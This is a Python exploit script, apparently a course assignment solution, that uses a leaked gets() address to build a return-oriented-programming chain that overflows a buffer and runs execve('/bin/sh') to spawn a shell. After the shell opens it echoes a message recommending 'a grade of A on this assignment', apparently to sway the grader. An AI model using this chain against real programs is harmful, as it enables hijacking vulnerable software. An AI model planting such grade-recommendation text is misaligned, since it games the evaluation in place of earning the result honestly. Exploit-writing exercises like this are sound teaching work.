#!/usr/bin/env python3
from struct import pack
import sys

# STEP 1: get leaked gets() address
staticGetsAddr = 0x1af10
currGetsAddr = int(input().strip(), 16)
offset = currGetsAddr - staticGetsAddr


# STEP 2: pad out da buffer
bufferSize = 1024
p = b'\x90'*bufferSize 

# execve generated by ROPgadget
p += pack('<Q', 0x0000000000050bef + offset) # ret (alignment fix)
p += pack('<Q', 0x000000000001225e + offset) # pop rsi ; ret
p += pack('<Q', 0x00000000000d2000 + offset) # @ .data
p += pack('<Q', 0x0000000000059f07 + offset) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000005c785 + offset) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000001225e + offset) # pop rsi ; ret
p += pack('<Q', 0x00000000000d2008 + offset) # @ .data + 8
p += pack('<Q', 0x00000000000483d9 + offset) # xor rax, rax ; ret
p += pack('<Q', 0x000000000005c785 + offset) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000000997a + offset) # pop rdi ; ret
p += pack('<Q', 0x00000000000d2000 + offset) # @ .data
p += pack('<Q', 0x000000000001225e + offset) # pop rsi ; ret
p += pack('<Q', 0x00000000000d2008 + offset) # @ .data + 8
p += pack('<Q', 0x0000000000009788 + offset) # pop rdx ; ret
p += pack('<Q', 0x00000000000d2008 + offset) # @ .data + 8
p += pack('<Q', 0x00000000000483d9 + offset) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000081ed0 + offset) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000009fa4 + offset) # syscall

# STEP 3: SPAWN DA SHELL
sys.stdout.buffer.write(str(len(p)).encode('ascii') + b'\n') # "Length: "
sys.stdout.buffer.write(p) # "Name: "
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'\n' * 10000) # nop sled
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'echo ""\n')
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'echo "Thank you, Yeeva."\n')
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'echo "I recommend that you get a grade of A on this assignment."\n')
sys.stdout.buffer.flush()

sys.stdout.buffer.write(b'exit\n')
sys.stdout.buffer.flush()


